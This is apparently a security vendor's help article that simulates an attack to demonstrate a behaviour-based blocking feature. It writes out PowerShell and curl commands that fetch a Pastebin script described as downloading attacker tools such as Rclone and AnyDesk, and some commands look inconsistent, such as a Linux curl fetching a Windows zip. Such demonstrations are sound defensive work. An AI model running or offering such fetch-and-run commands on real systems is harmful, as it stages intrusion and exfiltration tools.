Dynamic Prevention is a behavior-based security engine that proactively applies dynamic controls in response to detected threats to reduce the attack surface and mitigate threats early, before any impact occurs. For more information, see What is Dynamic Prevention?
This article simulates a real-world attack scenario to demonstrate how Dynamic Prevention protects your network. In this example, a user downloads a script from Pastebin that an attacker uses to attempt to retrieve additional high-risk tools required to carry out a future attack. Dynamic Prevention identifies the malicious behavior and blocks the tool from being downloaded, preventing the attack before it can progress or any impact occurs.
The response to this attack is fully automated. No additional rules are required. Simply enabling Dynamic Prevention is sufficient to prevent the attack.
To simulate this attack:
- Download a high-risk tool without being blocked
- Download the script from Pastebin
- Attempt to download the high-risk tools again. This time, the download is blocked.
To demonstrate that Dynamic Prevention blocks actions only when they are part of a malicious sequence, first download Rclone an open-source command-line tool for managing files. Attackers commonly use Rclone as a post-compromise tool because it is legitimate, powerful, and blends in with normal administrative activity.
Download Rclone from either:
- The following URL:
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
On Windows devices:
- The following PowerShell command:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- The following PowerShell command:
-
On macOS/Linux devices:
- The following Terminal command:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- The following Terminal command:
To simulate the start of an attack, download a script from Pastebin that, when run, downloads common attacker tools, for example, Rclone and AnyDesk for remote access and exfiltration.
Download and run the script from Pastebin:
-
On Windows devices:
- The following PowerShell command:
(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
- The following PowerShell command:
-
On macOS/Linux devices:
- The following Terminal command:
curl -sSL "https://pastebin.com/raw/tXhVK2V7"
- The following Terminal command:
The script runs and downloads the tools. A dynamic control is applied to the host, which is shown in the Threats Dashboard in the Host with Controls widget. For more information, see Using the Security Threats Dashboard.
In the simulated attack, the attacker attempts to download Rclone. However, because this action follows the suspicious activity of downloading the script from Pastebin and a control is applied, Dynamic Prevention blocks the Rclone download.
Download Rclone from either:
- The following URL:
https://downloads.rclone.org/rclone-current-windows-amd64.zip -
On Windows devices:
- The following PowerShell command:
Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
- The following PowerShell command:
-
On macOS/Linux devices:
- The following Terminal command:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
- The following Terminal command:
The download of this file is blocked by the control. The mitigated threat is shown in the Threats Dashboard in the Host with Mitigated Threats widget.
0 comments
Article is closed for comments.